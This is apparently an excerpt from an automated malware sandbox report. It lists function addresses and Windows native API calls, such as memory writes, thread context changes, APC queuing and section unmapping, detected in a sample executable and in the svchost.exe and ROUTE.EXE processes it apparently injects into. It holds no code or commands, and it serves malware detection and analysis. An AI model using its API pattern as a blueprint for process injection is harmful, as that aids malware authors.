Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72B60 NtClose,LdrInitializeThunk,	1_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	1_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B74340 NtSetContextThread,	1_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B74650 NtSuspendThread,	1_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BA0 NtEnumerateValueKey,	1_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72B80 NtQueryInformationFile,	1_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BF0 NtAllocateVirtualMemory,	1_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72BE0 NtQueryValueKey,	1_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AB0 NtWaitForSingleObject,	1_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AF0 NtWriteFile,	1_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72AD0 NtReadFile,	1_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FB0 NtResumeThread,	1_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FA0 NtQuerySection,	1_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F90 NtProtectVirtualMemory,	1_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72FE0 NtCreateFile,	1_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F30 NtCreateSection,	1_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72F60 NtCreateProcessEx,	1_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72EA0 NtAdjustPrivilegesToken,	1_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72E80 NtReadVirtualMemory,	1_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72EE0 NtQueueApcThread,	1_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72E30 NtWriteVirtualMemory,	1_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DB0 NtEnumerateKey,	1_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72DD0 NtDelayExecution,	1_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D30 NtUnmapViewOfSection,	1_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D10 NtMapViewOfSection,	1_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72D00 NtSetInformationFile,	1_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CA0 NtQueryInformationToken,	1_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CF0 NtOpenProcess,	1_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72CC0 NtQueryVirtualMemory,	1_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C00 NtQueryInformationProcess,	1_2_03B72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72C60 NtCreateKey,	1_2_03B72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73090 NtSetValueKey,	1_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73010 NtOpenDirectoryObject,	1_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B739B0 NtGetContextThread,	1_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73D10 NtOpenProcessToken,	1_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B73D70 NtOpenThread,	1_2_03B73D70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03084340 NtSetContextThread,LdrInitializeThunk,	6_2_03084340
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03084650 NtSuspendThread,LdrInitializeThunk,	6_2_03084650
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082B60 NtClose,LdrInitializeThunk,	6_2_03082B60
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_03082BA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_03082BE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_03082BF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082AD0 NtReadFile,LdrInitializeThunk,	6_2_03082AD0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082AF0 NtWriteFile,LdrInitializeThunk,	6_2_03082AF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082F30 NtCreateSection,LdrInitializeThunk,	6_2_03082F30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082FB0 NtResumeThread,LdrInitializeThunk,	6_2_03082FB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082FE0 NtCreateFile,LdrInitializeThunk,	6_2_03082FE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_03082E80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_03082EE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_03082D10
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_03082D30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082DD0 NtDelayExecution,LdrInitializeThunk,	6_2_03082DD0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03082DF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082C60 NtCreateKey,LdrInitializeThunk,	6_2_03082C60
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03082C70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_03082CA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030835C0 NtCreateMutant,LdrInitializeThunk,	6_2_030835C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030839B0 NtGetContextThread,LdrInitializeThunk,	6_2_030839B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082B80 NtQueryInformationFile,	6_2_03082B80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082AB0 NtWaitForSingleObject,	6_2_03082AB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082F60 NtCreateProcessEx,	6_2_03082F60
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082F90 NtProtectVirtualMemory,	6_2_03082F90
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082FA0 NtQuerySection,	6_2_03082FA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082E30 NtWriteVirtualMemory,	6_2_03082E30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082EA0 NtAdjustPrivilegesToken,	6_2_03082EA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082D00 NtSetInformationFile,	6_2_03082D00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082DB0 NtEnumerateKey,	6_2_03082DB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082C00 NtQueryInformationProcess,	6_2_03082C00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082CC0 NtQueryVirtualMemory,	6_2_03082CC0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03082CF0 NtOpenProcess,	6_2_03082CF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03083010 NtOpenDirectoryObject,	6_2_03083010
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03083090 NtSetValueKey,	6_2_03083090
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03083D10 NtOpenProcessToken,	6_2_03083D10
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03083D70 NtOpenThread,	6_2_03083D70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02919730 NtCreateFile,	6_2_02919730
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02919A30 NtClose,	6_2_02919A30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02919BA0 NtAllocateVirtualMemory,	6_2_02919BA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_029198A0 NtReadFile,	6_2_029198A0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02919990 NtDeleteFile,	6_2_02919990

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CCA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00CCA1EF

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CB8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00CB8310

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CC51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00CC51BD

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C6E6A0	0_2_00C6E6A0
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8D975	0_2_00C8D975
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C6FCE0	0_2_00C6FCE0
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C821C5	0_2_00C821C5
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C962D2	0_2_00C962D2
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CE03DA	0_2_00CE03DA
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C9242E	0_2_00C9242E
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C825FA	0_2_00C825FA
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C766E1	0_2_00C766E1
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CBE616	0_2_00CBE616
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C9878F	0_2_00C9878F
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC8889	0_2_00CC8889
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C96844	0_2_00C96844
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CE0857	0_2_00CE0857
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C78808	0_2_00C78808
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8CB21	0_2_00C8CB21
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C96DB6	0_2_00C96DB6
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C76F9E	0_2_00C76F9E
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C73030	0_2_00C73030
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8F1D9	0_2_00C8F1D9
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C83187	0_2_00C83187
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C61287	0_2_00C61287
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C81484	0_2_00C81484
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C75520	0_2_00C75520
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C87696	0_2_00C87696
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C75760	0_2_00C75760
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C81978	0_2_00C81978
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C99AB5	0_2_00C99AB5
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CE7DDB	0_2_00CE7DDB
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C81D90	0_2_00C81D90
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8BDA6	0_2_00C8BDA6
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C73FE0	0_2_00C73FE0
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C6DF00	0_2_00C6DF00
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_01016800	0_2_01016800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418A93	1_2_00418A93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004011D0	1_2_004011D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042F243	1_2_0042F243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402A5C	1_2_00402A5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402A60	1_2_00402A60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004022C0	1_2_004022C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041028D	1_2_0041028D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410293	1_2_00410293
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E493	1_2_0040E493
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416C9E	1_2_00416C9E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416CA3	1_2_00416CA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004104B3	1_2_004104B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E5E3	1_2_0040E5E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E5E8	1_2_0040E5E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402580	1_2_00402580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402F30	1_2_00402F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C003E6	1_2_03C003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA352	1_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC02C0	1_2_03BC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF41A2	1_2_03BF41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C001AA	1_2_03C001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF81CC	1_2_03BF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30100	1_2_03B30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC8158	1_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3C7C0	1_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64750	1_2_03B64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5C6E0	1_2_03B5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C00591	1_2_03C00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40535	1_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEE4F6	1_2_03BEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE4420	1_2_03BE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF2446	1_2_03BF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF6BD7	1_2_03BF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFAB40	1_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3EA80	1_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B429A0	1_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0A9A6	1_2_03C0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B56962	1_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B268B8	1_2_03B268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E8F0	1_2_03B6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4A840	1_2_03B4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B42840	1_2_03B42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBEFA0	1_2_03BBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32FC8	1_2_03B32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60F30	1_2_03B60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE2F30	1_2_03BE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B82F28	1_2_03B82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4F40	1_2_03BB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B52E90	1_2_03B52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFCE93	1_2_03BFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFEEDB	1_2_03BFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFEE26	1_2_03BFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40E59	1_2_03B40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B58DBF	1_2_03B58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3ADE0	1_2_03B3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDCD1F	1_2_03BDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4AD00	1_2_03B4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0CB5	1_2_03BE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30CF2	1_2_03B30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40C00	1_2_03B40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B8739A	1_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF132D	1_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D34C	1_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B452A0	1_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D2F0	1_2_03B5D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE12ED	1_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4B1B0	1_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0B16B	1_2_03C0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7516C	1_2_03B7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF70E9	1_2_03BF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF0E0	1_2_03BFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF0CC	1_2_03BEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF7B0	1_2_03BFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF16CC	1_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B85630	1_2_03B85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C095C3	1_2_03C095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDD5B0	1_2_03BDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7571	1_2_03BF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFF43F	1_2_03BFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B31460	1_2_03B31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5FB80	1_2_03B5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB5BF0	1_2_03BB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B7DBF9	1_2_03B7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFB76	1_2_03BFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDDAAC	1_2_03BDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B85AA0	1_2_03B85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE1AA3	1_2_03BE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEDAC6	1_2_03BEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB3A6C	1_2_03BB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFA49	1_2_03BFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7A46	1_2_03BF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD5910	1_2_03BD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B49950	1_2_03B49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B950	1_2_03B5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B438E0	1_2_03B438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAD800	1_2_03BAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFFB1	1_2_03BFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41F92	1_2_03B41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B03FD2	1_2_03B03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B03FD5	1_2_03B03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFF09	1_2_03BFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B49EB0	1_2_03B49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5FDC0	1_2_03B5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF7D73	1_2_03BF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF1D5A	1_2_03BF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B43D40	1_2_03B43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFFCF2	1_2_03BFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB9C32	1_2_03BB9C32
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310A352	6_2_0310A352
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0305E3F0	6_2_0305E3F0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_031103E6	6_2_031103E6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030F0274	6_2_030F0274
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030D02C0	6_2_030D02C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03040100	6_2_03040100
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030EA118	6_2_030EA118
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030D8158	6_2_030D8158
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_031041A2	6_2_031041A2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_031101AA	6_2_031101AA
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_031081CC	6_2_031081CC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030E2000	6_2_030E2000
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03074750	6_2_03074750
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03050770	6_2_03050770
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0304C7C0	6_2_0304C7C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0306C6E0	6_2_0306C6E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03050535	6_2_03050535
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03110591	6_2_03110591
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030F4420	6_2_030F4420
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03102446	6_2_03102446
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030FE4F6	6_2_030FE4F6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310AB40	6_2_0310AB40
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03106BD7	6_2_03106BD7
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0304EA80	6_2_0304EA80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03066962	6_2_03066962
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030529A0	6_2_030529A0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0311A9A6	6_2_0311A9A6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03052840	6_2_03052840
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0305A840	6_2_0305A840
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030368B8	6_2_030368B8
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0307E8F0	6_2_0307E8F0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03092F28	6_2_03092F28
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03070F30	6_2_03070F30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030F2F30	6_2_030F2F30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030C4F40	6_2_030C4F40
